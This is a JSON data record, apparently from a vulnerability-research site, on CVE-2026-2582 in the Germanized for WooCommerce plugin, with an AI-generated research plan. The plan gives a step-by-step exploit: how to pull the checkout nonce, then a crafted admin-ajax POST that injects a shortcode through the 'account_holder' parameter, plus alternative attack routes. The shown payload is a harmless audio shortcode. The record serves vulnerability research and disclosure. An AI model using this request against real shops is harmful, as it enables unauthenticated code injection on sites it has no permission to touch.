[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fKT-vbdjfaTo-ycFyop1uW4RYWFg6VBF1CwMg5Nw3SvY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"source_links":37},"CVE-2026-2582","germanized-for-woocommerce-unauthenticated-arbitrary-shortcode-execution","Germanized for WooCommerce \u003C= 3.20.5 - Unauthenticated Arbitrary Shortcode Execution","The The Germanized for WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution via 'account_holder' parameter in all versions up to, and including, 3.20.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","woocommerce-germanized",null,"\u003C=3.20.5","3.20.6","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:L\u002FA:N","Improper Control of Generation of Code ('Code Injection')","2026-04-13 17:42:17","2026-04-14 06:43:52",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F9e6837ad-576f-4c25-9540-6144ddc8630e?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fcss\u002Flayout.scss","assets\u002Fjs\u002Fblocks\u002Fcart\u002Fslotfills.js","assets\u002Fjs\u002Fblocks\u002Fcheckout\u002Fcheckout-checkboxes\u002Fblock.json","assets\u002Fjs\u002Fblocks\u002Fcheckout\u002Fcheckout-photovoltaic-system-notice\u002Fblock.json","build\u002Fcart-style.asset.php","build\u002Fcart.asset.php","build\u002Fcart.js","build\u002Fcheckout-frontend.asset.php","researched",false,3,"# Vulnerability Research Plan: CVE-2026-2582 (Germanized for WooCommerce)\n\n## 1. Vulnerability Summary\nThe **Germanized for WooCommerce** plugin (versions \u003C= 3.20.5) is vulnerable to **Unauthenticated Arbitrary Shortcode Execution**. The vulnerability exists because the plugin accepts user-supplied input via the `account_holder` parameter (associated with the SEPA Direct Debit payment method) and processes this value using the `do_shortcode()` function without adequate sanitization or validation. This allows an unauthenticated attacker to execute any registered WordPress shortcode, potentially leading to information disclosure or further exploitation.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `woocommerce_update_order_review` (Standard WooCommerce AJAX action that the plugin hooks into to refresh payment information).\n*   **Vulnerable Parameter:** `account_holder` (often passed within the `post_data` string or as a direct POST parameter).\n*   **Authentication:** None required (Unauthenticated).\n*   **Preconditions:**\n    1.  The \"Direct Debit\" (SEPA) payment method must be enabled in Germanized for WooCommerce settings.\n    2.  At least one product must be in the WooCommerce cart to access the checkout flow and trigger the `update_order_review` action.\n\n## 3. Code Flow\n1.  **Entry Point:** An AJAX request is sent to `admin-ajax.php` with the action `woocommerce_update_order_review`.\n2.  **Hook:** WooCommerce triggers the `update_order_review` logic, which in turn calls hooks for active payment gateways.\n3.  **Germanized Logic:** The `WC_GZD_Gateway_Direct_Debit` class (or similar) handles the Direct Debit fields. It retrieves the `account_holder` value from the `$_POST` request.\n4.  **Vulnerable Sink:** The plugin generates an HTML notice or a review summary for the payment method. It incorporates the `account_holder` value into a template string and passes that string through `do_shortcode()`.\n    *   *Inferred logic:* `echo do_shortcode( sprintf( __( 'Direct debit from %s', 'woocommerce-germanized' ), $_POST['account_holder'] ) );`\n5.  **Execution:** The WordPress shortcode parser executes any shortcodes found in the `account_holder` string.\n\n## 4. Nonce Acquisition Strategy\nThe `woocommerce_update_order_review` action requires a WooCommerce security nonce.\n\n1.  **Add Product to Cart:** First, a product must be added to the cart to ensure the checkout page is accessible.\n    *   `GET \u002F?add-to-cart=[PRODUCT_ID]`\n2.  **Navigate to Checkout:** Navigate to the `\u002Fcheckout\u002F` page.\n3.  **Extract Nonce:** The nonce is localized by WooCommerce in the `wc_checkout_params` JavaScript object.\n    *   **JS Variable:** `window.wc_checkout_params?.update_order_review_nonce`\n4.  **Execution Agent Steps:**\n    *   `browser_navigate(\"\u002Fcheckout\u002F\")`\n    *   `NONCE = browser_eval(\"window.wc_checkout_params?.update_order_review_nonce\")`\n\n## 5. Exploitation Strategy\nThe exploit involves sending a specially crafted AJAX request to trigger the shortcode execution during the order review update.\n\n### Step 1: Data Preparation\n*   Identify a test product ID.\n*   Get the `update_order_review_nonce`.\n\n### Step 2: Construct Payload\n*   **Shortcode:** `[audio src=\"https:\u002F\u002Fexample.com\u002Fexploit.mp3\"]` (This is a safe, standard shortcode that renders an HTML5 audio tag, proving execution).\n*   **Alternative (Information Disclosure):** `[gallery]` or any shortcode that leaks content if applicable.\n\n### Step 3: Send Exploit Request\nUse the `http_request` tool to perform a POST request.\n\n*   **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=woocommerce_update_order_review\n    &security=[NONCE]\n    &payment_method=direct_debit\n    &account_holder=[audio src=\"https:\u002F\u002Fexample.com\u002Fexploit.mp3\"]\n    &post_data=billing_account_holder%3D%5Baudio+src%3D%22https%3A%2F%2Fexample.com%2Fexploit.mp3%22%5D%26payment_method%3Ddirect_debit\n    ```\n    *(Note: The parameter may be processed either from the top level or inside `post_data`. Including both ensures coverage.)*\n\n## 6. Test Data Setup\n1.  **Create Product:** `wp post create --post_type=product --post_title='Test Product' --post_status=publish`\n2.  **Enable Gateway:** Ensure the Germanized Direct Debit gateway is active.\n    *   `wp option update woocommerce_direct_debit_settings '{\"enabled\":\"yes\"}'` (Note: Check the exact option name if this fails).\n3.  **Add to Cart:** `GET \u002F?add-to-cart=[PRODUCT_ID]`\n\n## 7. Expected Results\n*   The server will return a JSON object with a `fragments` key.\n*   The `fragments` HTML will contain the rendered output of the shortcode.\n*   For the `[audio]` shortcode, look for: `\u003Caudio class=\"wp-audio-shortcode\" ...>` or similar HTML tags in the response body.\n\n## 8. Verification Steps\n1.  **Analyze AJAX Response:** Use `http_request` and inspect the response body for the string `\u003Caudio`.\n2.  **Check for Non-Escaped Output:** Confirm that the shortcode characters `[` and `]` were not literally reflected, but replaced by their rendered HTML equivalent.\n\n## 9. Alternative Approaches\nIf `woocommerce_update_order_review` does not reflect the output, the vulnerability may be triggered on the final checkout submission:\n1.  **Action:** `wc-ajax=checkout`\n2.  **Payload:** Submit the checkout form with `billing_account_holder=[shortcode]`.\n3.  **Observation:** Check the resulting \"Thank You\" (Order Received) page for the rendered shortcode output. This page is usually at `\u002Fcheckout\u002Forder-received\u002F[ORDER_ID]\u002F`.\n\nIf `account_holder` is not the correct parameter name for the specific version, check for `billing_account_holder` or `sepa_account_holder`. The CVE description specifically points to `account_holder`.","gemini-3-flash-preview","2026-04-16 15:54:44","2026-04-16 15:55:33",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","3.20.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce-germanized\u002Ftags\u002F3.20.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoocommerce-germanized.3.20.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce-germanized\u002Ftags\u002F3.20.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoocommerce-germanized.3.20.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce-germanized\u002Ftags"]